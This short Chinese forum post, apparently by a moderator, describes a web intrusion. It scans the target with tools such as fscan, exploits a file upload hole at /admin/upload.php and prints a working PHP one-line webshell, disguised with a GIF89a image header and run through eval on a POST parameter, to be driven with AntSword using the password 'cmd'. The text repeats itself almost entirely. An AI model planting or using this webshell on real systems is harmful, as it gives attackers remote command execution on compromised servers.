信息收集
用fscan、kscan、Tscanplus……等等的工具扫描扫描扫描…….
漏洞利用
虽然发现了永恒之蓝漏洞,但本次的重点是web,所以我们的的侧重点在/admin/upload.php文件上传漏洞
上传webshell(一句话木马)
webshell:
GIF89a
<?php @eval($_POST[cmd]);?>
上传后用蚁剑连接,密码为”cmd”。
完成
用fscan、kscan、Tscanplus……等等的工具扫描扫描扫描…….
虽然发现了永恒之蓝漏洞,但本次的重点是web,所以我们的的侧重点在/admin/upload.php文件上传漏洞
上传webshell(一句话木马)
webshell:
GIF89a
<?php @eval($_POST[cmd]);?>
上传后用蚁剑连接,密码为”cmd”。
完成
超级版主
